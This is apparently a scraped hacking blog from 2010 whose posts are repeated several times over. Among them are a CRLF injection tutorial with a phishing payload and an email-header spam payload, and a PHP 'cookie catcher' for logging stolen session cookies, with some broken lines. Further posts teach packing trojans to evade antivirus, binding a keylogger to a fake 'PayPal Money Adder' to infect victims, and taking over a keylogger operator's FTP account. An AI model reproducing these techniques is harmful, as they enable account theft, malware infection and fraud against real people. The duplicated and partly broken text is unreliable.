port on the target host one by one.
If the remote port is closed, then the server replies with a Port
Unreachable ICMP error message. If the port is open then no such error
message is generated.
3. FTP Bounce Port Scanning: The FTP bounce port scanning technique was
discovered by Hobbit. He revealed a very interesting loophole in the FTP
protocol that allowed users connected to the FTP service of a particular
system to connect to any port of another system. This loophole allows
anonymous port scanning.
"OWN HACK"
///////////////////////////////////////////
How to Own a Hacker - Reverting Keyloggers and Stealers
How to know if you are
infected with RATs or Keyloggers. Here i will show you how to revert those
keyloggers, RATs, or stealers, and find who sent them to you.
What is Reverting?
Reverting generally means reversing an action or undoing the changes. Here
in our case, reverting would be more of reversing the action.
For this we will need a keylogger server using ftp. It can be found on
warez sites, youtube etc. You basically need the following things:
Keylogger, passstealerCain and AbelVirtual machine (so you don't get
infected, and what if the hacker is using better protocol that would be
epic fail).
Getting Started:
Execute the keylogger on your virtual machine.
Now run Cain and Abel and do the following things as per stated order.
Wait for sometime and then check back the passwords area.
As you can see the keylogger used ftp protocol to transfer the logs. Ftp
protocol isn't very safe since it doesn't encrypt the data. Anyways you
should see the IP address where your PC is sending packets. And also the
username and password. This might not work if the server is using other
protocol like http, smtp, etc. you'll most probably get junk values in user
and pass box if those protocols are used.
So i open the ipaddress http://66.220.9.50/
Guess what its our very own drivehq.com =D. Now login using ftp password
that we got from the sniffer and get going. I would recommend to steal the
logs quietly like a ninja, so you can get others logs as well. Of course
you can change the pass if you want but it won't send any further logs.
How to Own a Hacker - Reverting Keyloggers and Stealers
How to know if you are
infected with RATs or Keyloggers. Here i will show you how to revert those
keyloggers, RATs, or stealers, and find who sent them to you.
What is Reverting?
Reverting generally means reversing an action or undoing the changes. Here
in our case, reverting would be more of reversing the action.
For this we will need a keylogger server using ftp. It can be found on
warez sites, youtube etc. You basically need the following things:
Keylogger, passstealerCain and AbelVirtual machine (so you don't get
infected, and what if the hacker is using better protocol that would be
epic fail).
Getting Started:
Execute the keylogger on your virtual machine.
Now run Cain and Abel and do the following things as per stated order.
Wait for sometime and then check back the passwords area.
As you can see the keylogger used ftp protocol to transfer the logs. Ftp
protocol isn't very safe since it doesn't encrypt the data. Anyways you
should see the IP address where your PC is sending packets. And also the
username and password. This might not work if the server is using other
protocol like http, smtp, etc. you'll most probably get junk values in user
and pass box if those protocols are used.
So i open the ipaddress http://66.220.9.50/
Guess what its our very own drivehq.com =D. Now login using ftp password
that we got from the sniffer and get going. I would recommend to steal the
logs quietly like a ninja, so you can get others logs as well. Of course
you can change the pass if you want but it won't send any further logs.
"OWN HACK"
///////////////////////////////////////////
How to Own a Hacker - Reverting Keyloggers and Stealers
How to know if you are
infected with RATs or Keyloggers. Here i will show you how to revert those
keyloggers, RATs, or stealers, and find who sent them to you.
What is Reverting?
Reverting generally means reversing an action or undoing the changes. Here
in our case, reverting would be more of reversing the action.
For this we will need a keylogger server using ftp. It can be found on
warez sites, youtube etc. You basically need the following things:
Keylogger, passstealerCain and AbelVirtual machine (so you don't get
infected, and what if the hacker is using better protocol that would be
epic fail).
Getting Started:
Execute the keylogger on your virtual machine.
Now run Cain and Abel and do the following things as per stated order.
Wait for sometime and then check back the passwords area.
As you can see the keylogger used ftp protocol to transfer the logs. Ftp
protocol isn't very safe since it doesn't encrypt the data. Anyways you
should see the IP address where your PC is sending packets. And also the
username and password. This might not work if the server is using other
protocol like http, smtp, etc. you'll most probably get junk values in user
and pass box if those protocols are used.
So i open the ipaddress http://66.220.9.50/
Guess what its our very own drivehq.com =D. Now login using ftp password
that we got from the sniffer and get going. I would recommend to steal the
logs quietly like a ninja, so you can get others logs as well. Of course
you can change the pass if you want but it won't send any further logs.
How to Own a Hacker - Reverting Keyloggers and Stealers
How to know if you are
infected with RATs or Keyloggers. Here i will show you how to revert those
keyloggers, RATs, or stealers, and find who sent them to you.
What is Reverting?
Reverting generally means reversing an action or undoing the changes. Here
in our case, reverting would be more of reversing the action.
For this we will need a keylogger server using ftp. It can be found on
warez sites, youtube etc. You basically need the following things:
Keylogger, passstealerCain and AbelVirtual machine (so you don't get
infected, and what if the hacker is using better protocol that would be
epic fail).
Getting Started:
Execute the keylogger on your virtual machine.
Now run Cain and Abel and do the following things as per stated order.
Wait for sometime and then check back the passwords area.
As you can see the keylogger used ftp protocol to transfer the logs. Ftp
protocol isn't very safe since it doesn't encrypt the data. Anyways you
should see the IP address where your PC is sending packets. And also the
username and password. This might not work if the server is using other
protocol like http, smtp, etc. you'll most probably get junk values in user
and pass box if those protocols are used.
So i open the ipaddress http://66.220.9.50/
Guess what its our very own drivehq.com =D. Now login using ftp password
that we got from the sniffer and get going. I would recommend to steal the
logs quietly like a ninja, so you can get others logs as well. Of course
you can change the pass if you want but it won't send any further logs.
"LOCK FOLDER WITHOUT ANY SOFTWARE"
///////////////////////////////////////////
Lock Folder without using any Software
How to lock a Folder without using any Software? People generally use
folder lock software to hide or lock confidential data from others. But why
use those softwares, however you can protect/lock those data without using
any software. Here I am going to tell you two methods through which you can
hide or lock folders in order to protect your confidential data from
others. Follow the guidelines from bellow.
Lock Folder without using any Software (Method 1):
Make a new Folder
Inside Folder make a (TXT) file and copy the following code inside it
Quote: cls
@ECHO OFF
title Folder Private
if EXIST Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D} goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p cho=>
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}
attrib +h +s Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p pass=>
if NOT %pass%== password here goto FAIL
attrib -h -s Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}
ren Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D} Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
Now go the line ( 23 ), You will find this word : password here (Change it
with ) any password u like
After that, Save the (TXT) file as (locker.bat)
Now back to the folder and you will find a ( LOCKER ) commanding
Now Click on it
After clicking on it you will see a new folder (Private )
Now copy the files, which you want to hide or protect
After that again go to ( LOCKER ) and click on it
It will open and ask you want lock your folder? Y/N ?
Type Y
And that is it, you have simply done
Now to view or unlock it again, Click on ( LOCKER ) and type your password
Lock Folder without using any Software (Method 2):
Note: For this you should have folder in NTFS drive
Open run
Type cmd
Now type cacls e:\(name of the folder in drive e) /d everyone For Locking
Folder
For unlocking type cacls e:\(name of the folder in drive e) /g everyone:f
Once you have locked the Folder, whenever someone wants to open it, it will
show a message access is denied
Well, This is how you can lock or protect your valuable data from others
without using any software or programs.
Regards kid
Lock Folder without using any Software
How to lock a Folder without using any Software? People generally use
folder lock software to hide or lock confidential data from others. But why
use those softwares, however you can protect/lock those data without using
any software. Here I am going to tell you two methods through which you can
hide or lock folders in order to protect your confidential data from
others. Follow the guidelines from bellow.
Lock Folder without using any Software (Method 1):
Make a new Folder
Inside Folder make a (TXT) file and copy the following code inside it
Quote: cls
@ECHO OFF
title Folder Private
if EXIST Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D} goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p cho=>
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}
attrib +h +s Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p pass=>
if NOT %pass%== password here goto FAIL
attrib -h -s Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}
ren Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D} Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
Now go the line ( 23 ), You will find this word : password here (Change it
with ) any password u like
After that, Save the (TXT) file as (locker.bat)
Now back to the folder and you will find a ( LOCKER ) commanding
Now Click on it
After clicking on it you will see a new folder (Private )
Now copy the files, which you want to hide or protect
After that again go to ( LOCKER ) and click on it
It will open and ask you want lock your folder? Y/N ?
Type Y
And that is it, you have simply done
Now to view or unlock it again, Click on ( LOCKER ) and type your password
Lock Folder without using any Software (Method 2):
Note: For this you should have folder in NTFS drive
Open run
Type cmd
Now type cacls e:\(name of the folder in drive e) /d everyone For Locking
Folder
For unlocking type cacls e:\(name of the folder in drive e) /g everyone:f
Once you have locked the Folder, whenever someone wants to open it, it will
show a message access is denied
Well, This is how you can lock or protect your valuable data from others
without using any software or programs.
Regards kid
Tuesday, October 5, 2010
"CRLF injection attack"
///////////////////////////////////////////
What is CRLF Injection Attack? - CRLF Injections Tutorial
Hi there. In this article we will talk about CRLF Injection. The CRLF
Injection Attack (sometimes also referred to as HTTP Response Splitting) is
a fairly simple, yet extremely powerful web attack. Hackers are actively
exploiting this web application vulnerability to perform a large variety of
attacks that include XSS cross-site scripting, cross-user defacement,
positioning of client’s web-cache, hijacking of web pages, defacement and a
myriad of other related attacks. A number of years ago a number of CRLF
injection vulnerabilities were also discovered in Google’s Adwords web
interface.
Today you will learn:
What is a CRLF Injection?Vulnerability PoC - Comment SystemVulnerability
PoC - Email FormVulnerability PoC - Header InjectionPatchingConclusion
What is a CRLF Injection?
Carraige Return Line Feed (CRLF) work due to improper sanatization in user
input. The carriage return is essentially the same as hitting 'Enter'
or 'Return', creating a new line. The carriage return can be represented in
a few different ways: CR, ASCII 13 or r. Both the carriage return and the
line feed do essentially the same thing. Although, the line feed is
represented as LF, ASCII 10 or n. These commands are printer commands, the
line feed tells the printer to feed out one line and a carriage return said
the printer carriage should go to the beginning of the current line. In the
event you know the operating system of the target machine it will prove
useful to know that Windows uses CR/LF but *nix systems only use LF.
Vulnerability PoC - Comment System
To illustrate the first method of CRLF we will be using a hypothetical
comment application which is vulnerable to the attack. Let's say our
current comment system looks like so:
8/04/07 - DaveSomething is wrong with the login system?
09/04/07 - haZedYeah, you should fix it....
Keep in mind both of these posts are legitimate. To exploit the
vulnerability our attack will craft a post that will make it seem like he's
posting as an administrator. He will enter the following into the comment
box:
Yep, doesn't work..n10/04/07/ - Admin I've relocated the login to
http://attackersite.com/login.php, you should be able to login there.
This extremely simple injection will change the comment output the
following result.
8/04/07 - DaveSomething is wrong with the login system?
09/04/07 - haZedYeah, you should fix it....
09/04/07 - EthernetYep, doesn't work..
10/04/07 - Admin I've relocated the login to
http://attackersite.com/login.php
As you can clearly see in the example, by posing as an administrator we are
able to phish passwords from the unsuspecting users. By inserting our new
line character in to the post we can go down a line and pretend to be an
administrator. It's a pretty neat trick.
Vulnerability PoC - Email Form
The second and final example involves a script used to send emails to other
users. The catch is that you cannot see the real email address of the
person you are sending to. To exploit this we can simple insert the
following in to the 'Subject' header:
Hey, it's DavenBcc: dave@email.comdave@email.com
This injection will send the email over to dave@email.comdave@email.com AND
the person we originally specified in the 'To' column. These mail forms can
also be exploited by spammers in order to hide their identity. By using a
similar method as above they can'Cc' and 'Bcc' the message to 100's of
other people spamming their
inboxes anonymously.
Vulnerability PoC - Header Injection
As an alternative to inserting the carriage return-line feed in to an input
box we can also use a program like Achilles to intercept the POST headers
and then modify them. Using a similar example as to the Email Form example
above we could change our headers like so:
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
name=This+is+a+test+&emai l= dave@coldmail.comdave@coldmail.com&subje
ct=Test&header=Header:
noone@thingy.comnoone@thingy.com
CC: fbi.gov@meow.comfbi.gov@meow.com
Bcc:enigmagroup.test.@eg. com,
psychomarine@enigmagroup. org,
ausome1@enigmagroup.orgausome1@enigmagroup.org
&msg=crlf!
As you can plainly see in the above example we are able to modify the
header in order to spam those email addresses.
Patching
The CRLF vulnerability is extremely easy to patch. The following code
example assumes the input is set to $_POST['input']
if (eregi('n', $_POST['input'])) //This checks for the new line character
in the POST variable
{ //start if..
die("CRLF Attack Detected"); //exit program if CRLF is found in the variable
} //end if..
I have commented the code so that you can gain an idea of how we are fixing
this vulnerability. As you can see it doesn't take much to thwart this
vulnerability. Sadly, not many people are implementing such a patch.
Conclusion
Whether you're dealing with a high risk vulnerability (remote file
inclusion) or a low risk one, such as this, you always need to be aware of
what you're dealing with. In creating this article I hoped to enlighten
some of you as to how this vulnerability works. I hope you've enjoyed this
article. Feedback and constructive criticism is encourage.
What is CRLF Injection Attack? - CRLF Injections Tutorial
Hi there. In this article we will talk about CRLF Injection. The CRLF
Injection Attack (sometimes also referred to as HTTP Response Splitting) is
a fairly simple, yet extremely powerful web attack. Hackers are actively
exploiting this web application vulnerability to perform a large variety of
attacks that include XSS cross-site scripting, cross-user defacement,
positioning of client’s web-cache, hijacking of web pages, defacement and a
myriad of other related attacks. A number of years ago a number of CRLF
injection vulnerabilities were also discovered in Google’s Adwords web
interface.
Today you will learn:
What is a CRLF Injection?Vulnerability PoC - Comment SystemVulnerability
PoC - Email FormVulnerability PoC - Header InjectionPatchingConclusion
What is a CRLF Injection?
Carraige Return Line Feed (CRLF) work due to improper sanatization in user
input. The carriage return is essentially the same as hitting 'Enter'
or 'Return', creating a new line. The carriage return can be represented in
a few different ways: CR, ASCII 13 or r. Both the carriage return and the
line feed do essentially the same thing. Although, the line feed is
represented as LF, ASCII 10 or n. These commands are printer commands, the
line feed tells the printer to feed out one line and a carriage return said
the printer carriage should go to the beginning of the current line. In the
event you know the operating system of the target machine it will prove
useful to know that Windows uses CR/LF but *nix systems only use LF.
Vulnerability PoC - Comment System
To illustrate the first method of CRLF we will be using a hypothetical
comment application which is vulnerable to the attack. Let's say our
current comment system looks like so:
8/04/07 - DaveSomething is wrong with the login system?
09/04/07 - haZedYeah, you should fix it....
Keep in mind both of these posts are legitimate. To exploit the
vulnerability our attack will craft a post that will make it seem like he's
posting as an administrator. He will enter the following into the comment
box:
Yep, doesn't work..n10/04/07/ - Admin I've relocated the login to
http://attackersite.com/login.php, you should be able to login there.
This extremely simple injection will change the comment output the
following result.
8/04/07 - DaveSomething is wrong with the login system?
09/04/07 - haZedYeah, you should fix it....
09/04/07 - EthernetYep, doesn't work..
10/04/07 - Admin I've relocated the login to
http://attackersite.com/login.php
As you can clearly see in the example, by posing as an administrator we are
able to phish passwords from the unsuspecting users. By inserting our new
line character in to the post we can go down a line and pretend to be an
administrator. It's a pretty neat trick.
Vulnerability PoC - Email Form
The second and final example involves a script used to send emails to other
users. The catch is that you cannot see the real email address of the
person you are sending to. To exploit this we can simple insert the
following in to the 'Subject' header:
Hey, it's DavenBcc: dave@email.comdave@email.com
This injection will send the email over to dave@email.comdave@email.com AND
the person we originally specified in the 'To' column. These mail forms can
also be exploited by spammers in order to hide their identity. By using a
similar method as above they can'Cc' and 'Bcc' the message to 100's of
other people spamming their
inboxes anonymously.
Vulnerability PoC - Header Injection
As an alternative to inserting the carriage return-line feed in to an input
box we can also use a program like Achilles to intercept the POST headers
and then modify them. Using a similar example as to the Email Form example
above we could change our headers like so:
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
name=This+is+a+test+&emai l= dave@coldmail.comdave@coldmail.com&subje
ct=Test&header=Header:
noone@thingy.comnoone@thingy.com
CC: fbi.gov@meow.comfbi.gov@meow.com
Bcc:enigmagroup.test.@eg. com,
psychomarine@enigmagroup. org,
ausome1@enigmagroup.orgausome1@enigmagroup.org
&msg=crlf!
As you can plainly see in the above example we are able to modify the
header in order to spam those email addresses.
Patching
The CRLF vulnerability is extremely easy to patch. The following code
example assumes the input is set to $_POST['input']
if (eregi('n', $_POST['input'])) //This checks for the new line character
in the POST variable
{ //start if..
die("CRLF Attack Detected"); //exit program if CRLF is found in the variable
} //end if..
I have commented the code so that you can gain an idea of how we are fixing
this vulnerability. As you can see it doesn't take much to thwart this
vulnerability. Sadly, not many people are implementing such a patch.
Conclusion
Whether you're dealing with a high risk vulnerability (remote file
inclusion) or a low risk one, such as this, you always need to be aware of
what you're dealing with. In creating this article I hoped to enlighten
some of you as to how this vulnerability works. I hope you've enjoyed this
article. Feedback and constructive criticism is encourage.
"COOKIE CATCHER"
///////////////////////////////////////////
Learn How to Make a Cookie Catcher
In this post i am going to show you how to make a cookie catcher. Before we
start let see what are cookies and what is cookie catcher used for.
What is a cookie?
A cookie is a special thing used store information on a web browser such as
user logins, passwords, etc.
What is a cookie catcher?
A cookie catcher is an XSS (cross-site scripting) exploitation that allows
you to take someone's cookies (log-in info). It keeps a record of them, and
the person can log-in as you using your cookies.
Is making a cookie catcher hard?
Not at all. The hard part is getting someone to click on a link that contains the cookie catcher.
How to make a Cookie Catcher
OkaY so now we are going to get down to the cookie catcher.
First you need a webserver which supports php.
Now that you have that we can begin.
Here is the cookie catcher:
PHP Code:
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Website: '.$referer.'
');
fclose($fp);
header ("javascript:history.back()");
?>
Now lets break that piece of code down, so that everyone can understand the working of code easily...
tells the server that this piece of code up to the
?>is php code.
$cookie = $_GET['cookie'];This gets the cookie from the web browser using
php's GET statement
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$referer=$_SERVER['HTTP_REFERER'];REMOTE_ADDR is the user's IP
date is well the date the cookie was taken
HTTP_REFERER is the site the user came from
$fp = fopen('cookies.html' 'a');
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Website: ‘.$referer.’
’);
fclose($fp);This piece of code does a couple of things. First is opens a
file called cookies.html on the server. Then it writes the cookie info to
the file (Cookie it's self, date, and website the person came from). After
that it adds three returns (). Next it closes the file cookies.html
header ("javascript:history.back()");
This last piece of code sends the user back to the last page they were on
before they clicked on the link
?>This like I said earlier in case you don't remember ends the php
script.There that is it! You've made your very own cookie catcher for
stealing cookies from people's browsers!
An example of this script in action is: Just upload the script on a free
hosting like - http://abc.com/cookie.php
Regards kid
Learn How to Make a Cookie Catcher
In this post i am going to show you how to make a cookie catcher. Before we
start let see what are cookies and what is cookie catcher used for.
What is a cookie?
A cookie is a special thing used store information on a web browser such as
user logins, passwords, etc.
What is a cookie catcher?
A cookie catcher is an XSS (cross-site scripting) exploitation that allows
you to take someone's cookies (log-in info). It keeps a record of them, and
the person can log-in as you using your cookies.
Is making a cookie catcher hard?
Not at all. The hard part is getting someone to click on a link that contains the cookie catcher.
How to make a Cookie Catcher
OkaY so now we are going to get down to the cookie catcher.
First you need a webserver which supports php.
Now that you have that we can begin.
Here is the cookie catcher:
PHP Code:
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Website: '.$referer.'
');
fclose($fp);
header ("javascript:history.back()");
?>
Now lets break that piece of code down, so that everyone can understand the working of code easily...
tells the server that this piece of code up to the
?>is php code.
$cookie = $_GET['cookie'];This gets the cookie from the web browser using
php's GET statement
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$referer=$_SERVER['HTTP_REFERER'];REMOTE_ADDR is the user's IP
date is well the date the cookie was taken
HTTP_REFERER is the site the user came from
$fp = fopen('cookies.html' 'a');
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Website: ‘.$referer.’
’);
fclose($fp);This piece of code does a couple of things. First is opens a
file called cookies.html on the server. Then it writes the cookie info to
the file (Cookie it's self, date, and website the person came from). After
that it adds three returns (). Next it closes the file cookies.html
header ("javascript:history.back()");
This last piece of code sends the user back to the last page they were on
before they clicked on the link
?>This like I said earlier in case you don't remember ends the php
script.There that is it! You've made your very own cookie catcher for
stealing cookies from people's browsers!
An example of this script in action is: Just upload the script on a free
hosting like - http://abc.com/cookie.php
Regards kid
"COOKIE CATCHER"
///////////////////////////////////////////
Learn How to Make a Cookie Catcher
In this post i am going to show you how to make a cookie catcher. Before we
start let see what are cookies and what is cookie catcher used for.
What is a cookie?
A cookie is a special thing used store information on a web browser such as
user logins, passwords, etc.
What is a cookie catcher?
A cookie catcher is an XSS (cross-site scripting) exploitation that allows
you to take someone's cookies (log-in info). It keeps a record of them, and
the person can log-in as you using your cookies.
Is making a cookie catcher hard?
Not at all. The hard part is getting someone to click on a link that contains the cookie catcher.
How to make a Cookie Catcher
OkaY so now we are going to get down to the cookie catcher.
First you need a webserver which supports php.
Now that you have that we can begin.
Here is the cookie catcher:
PHP Code:
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Website: '.$referer.'
');
fclose($fp);
header ("javascript:history.back()");
?>
Now lets break that piece of code down, so that everyone can understand the working of code easily...
tells the server that this piece of code up to the
?>is php code.
$cookie = $_GET['cookie'];This gets the cookie from the web browser using
php's GET statement
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$referer=$_SERVER['HTTP_REFERER'];REMOTE_ADDR is the user's IP
date is well the date the cookie was taken
HTTP_REFERER is the site the user came from
$fp = fopen('cookies.html' 'a');
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Website: ‘.$referer.’
’);
fclose($fp);This piece of code does a couple of things. First is opens a
file called cookies.html on the server. Then it writes the cookie info to
the file (Cookie it's self, date, and website the person came from). After
that it adds three returns (). Next it closes the file cookies.html
header ("javascript:history.back()");
This last piece of code sends the user back to the last page they were on
before they clicked on the link
?>This like I said earlier in case you don't remember ends the php
script.There that is it! You've made your very own cookie catcher for
stealing cookies from people's browsers!
An example of this script in action is: Just upload the script on a free
hosting like - http://abc.com/cookie.php
Regards kid
Learn How to Make a Cookie Catcher
In this post i am going to show you how to make a cookie catcher. Before we
start let see what are cookies and what is cookie catcher used for.
What is a cookie?
A cookie is a special thing used store information on a web browser such as
user logins, passwords, etc.
What is a cookie catcher?
A cookie catcher is an XSS (cross-site scripting) exploitation that allows
you to take someone's cookies (log-in info). It keeps a record of them, and
the person can log-in as you using your cookies.
Is making a cookie catcher hard?
Not at all. The hard part is getting someone to click on a link that contains the cookie catcher.
How to make a Cookie Catcher
OkaY so now we are going to get down to the cookie catcher.
First you need a webserver which supports php.
Now that you have that we can begin.
Here is the cookie catcher:
PHP Code:
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Website: '.$referer.'
');
fclose($fp);
header ("javascript:history.back()");
?>
Now lets break that piece of code down, so that everyone can understand the working of code easily...
tells the server that this piece of code up to the
?>is php code.
$cookie = $_GET['cookie'];This gets the cookie from the web browser using
php's GET statement
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$referer=$_SERVER['HTTP_REFERER'];REMOTE_ADDR is the user's IP
date is well the date the cookie was taken
HTTP_REFERER is the site the user came from
$fp = fopen('cookies.html' 'a');
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Website: ‘.$referer.’
’);
fclose($fp);This piece of code does a couple of things. First is opens a
file called cookies.html on the server. Then it writes the cookie info to
the file (Cookie it's self, date, and website the person came from). After
that it adds three returns (). Next it closes the file cookies.html
header ("javascript:history.back()");
This last piece of code sends the user back to the last page they were on
before they clicked on the link
?>This like I said earlier in case you don't remember ends the php
script.There that is it! You've made your very own cookie catcher for
stealing cookies from people's browsers!
An example of this script in action is: Just upload the script on a free
hosting like - http://abc.com/cookie.php
Regards kid
"UNDETECTABLE TROJAN"
///////////////////////////////////////////
How to Make a Trojan Undetectable by Antivirus Software
I've been writing a lot about trojans, and keyloggers on this blog. It's
very simple to make a trojan/keylogger, but to make it undetectable by the
antiviruses is the hard part. Nowadays crypting trojan don't give a good
result if you use use a public crypter, otherwise you need to buy a private
edition or to hex it. Here i am going to show you how to make a trojan,
keylogger, or RAT that won't be detected by any anti-virus software.
We gonna need a Privacy Protection Software. This kind of software is used
by program creators to protect their creation from cracking and reverse
engineering. We gonna do the same to a trojan and you are going to see the
result.
1. First of all you need to download the program: PC Guard for Win32
2. Open the program, and in the "Application filename" browse your server's
location.
2. Click on the "General" tab.
3. Now do the same with the "Security & Encryption" tab.
4. At the end choose "Protection Methods", and select the following options:
We are done!
The Scan Results:
Poison Ivy server:
Bifrost server:
How to Make a Trojan Undetectable by Antivirus Software
I've been writing a lot about trojans, and keyloggers on this blog. It's
very simple to make a trojan/keylogger, but to make it undetectable by the
antiviruses is the hard part. Nowadays crypting trojan don't give a good
result if you use use a public crypter, otherwise you need to buy a private
edition or to hex it. Here i am going to show you how to make a trojan,
keylogger, or RAT that won't be detected by any anti-virus software.
We gonna need a Privacy Protection Software. This kind of software is used
by program creators to protect their creation from cracking and reverse
engineering. We gonna do the same to a trojan and you are going to see the
result.
1. First of all you need to download the program: PC Guard for Win32
2. Open the program, and in the "Application filename" browse your server's
location.
2. Click on the "General" tab.
3. Now do the same with the "Security & Encryption" tab.
4. At the end choose "Protection Methods", and select the following options:
We are done!
The Scan Results:
Poison Ivy server:
Bifrost server:
Monday, October 4, 2010
"HACK PAYPAL ACCOUNT"-using TROjen
///////////////////////////////////////////
How to Hack PayPal Accounts using PayPal Hacking Software
How to Hack PayPal Accounts using
Fake Login Page. In this article i will show you how to hack PayPal
accounts using PayPal hacking software.
Note: Hacking credit cards or Bank accounts like PayPal is an illegal act,
this is only informational post and I am not responsible for any actions
done by you after reading this tutorial. This post is for educational
purposes only.
This is fake PayPal Money Adder software to help you bind your keylogger or
whatever Trojan server you have. This PayPal Money Adder software seems to
be used to Add some Money to your PayPal Account, but actually this is fake
PayPal Money Adder software used only as means for installing Trojan Server
binded with it on victim computer.
PayPal Money Adder to bind your Trojan Server
1. Download link of Fake PayPal Money Adder is HERE
2. PayPal Money Adder is free fake application which appears to hack PayPal
Accounts, now run .exe application to see something like this:
Note: PayPal Money Adder is a FAKE application. It doesn’t add any money
to your PayPal Account. It is only used to fool victim and to bind your
Trojan server.
3. When you open this, there is a TextBox to type your PayPal Email, and
you have to select how much money you want to Add. After that, click on
Send Money, and Progress Bar will start.
4. When Progress Bar is full, it will says “Money Has Been Added to your
Account Successfully “ as in the Picture below, but it wont add any money
to your Account !!!
5. So that is one fake PayPal Money Adder, not one real !!!
6. Now create a keylogger or whatever server (like stealer or RAT), crypt
it, and bind with this application. You can use Shock Labs File Binder or
Easy Binder. You can find some binders on this blog, just search for it !!!
7. Now, send this binded PayPal Money Adder to your victim and tell him
this PayPal Money Adder is used to Add Money to PayPal Accounts. You can
use Social Engineering for this. So as long as he runs PayPal Money Adder
on his computer, your keylogger server is installed on his computer.
8. Many other Fake Hacking Tools are coming soon, like AlertPay Money
Adder, Skype Money Adder, Ultimate Password Cracker, Neobux Hacker and
other!!!
How to Hack PayPal Accounts using PayPal Hacking Software
How to Hack PayPal Accounts using
Fake Login Page. In this article i will show you how to hack PayPal
accounts using PayPal hacking software.
Note: Hacking credit cards or Bank accounts like PayPal is an illegal act,
this is only informational post and I am not responsible for any actions
done by you after reading this tutorial. This post is for educational
purposes only.
This is fake PayPal Money Adder software to help you bind your keylogger or
whatever Trojan server you have. This PayPal Money Adder software seems to
be used to Add some Money to your PayPal Account, but actually this is fake
PayPal Money Adder software used only as means for installing Trojan Server
binded with it on victim computer.
PayPal Money Adder to bind your Trojan Server
1. Download link of Fake PayPal Money Adder is HERE
2. PayPal Money Adder is free fake application which appears to hack PayPal
Accounts, now run .exe application to see something like this:
Note: PayPal Money Adder is a FAKE application. It doesn’t add any money
to your PayPal Account. It is only used to fool victim and to bind your
Trojan server.
3. When you open this, there is a TextBox to type your PayPal Email, and
you have to select how much money you want to Add. After that, click on
Send Money, and Progress Bar will start.
4. When Progress Bar is full, it will says “Money Has Been Added to your
Account Successfully “ as in the Picture below, but it wont add any money
to your Account !!!
5. So that is one fake PayPal Money Adder, not one real !!!
6. Now create a keylogger or whatever server (like stealer or RAT), crypt
it, and bind with this application. You can use Shock Labs File Binder or
Easy Binder. You can find some binders on this blog, just search for it !!!
7. Now, send this binded PayPal Money Adder to your victim and tell him
this PayPal Money Adder is used to Add Money to PayPal Accounts. You can
use Social Engineering for this. So as long as he runs PayPal Money Adder
on his computer, your keylogger server is installed on his computer.
8. Many other Fake Hacking Tools are coming soon, like AlertPay Money
Adder, Skype Money Adder, Ultimate Password Cracker, Neobux Hacker and
other!!!
"Hack YouTUBE for More Subscribers"
///////////////////////////////////////////
How to Hack YouTube to Get More Subscribers
I found many users on YouTube that are making high quality videos, but they
are not getting much subscribers because of the big competition. This
tutorial will show all of you how to make it look like you have hundreds,
thousands and even millions of subscribers!
Before we start you need:
1. Mozilla Firefox [Download]
2. Firebug [Download]
Once you have got those we can begin
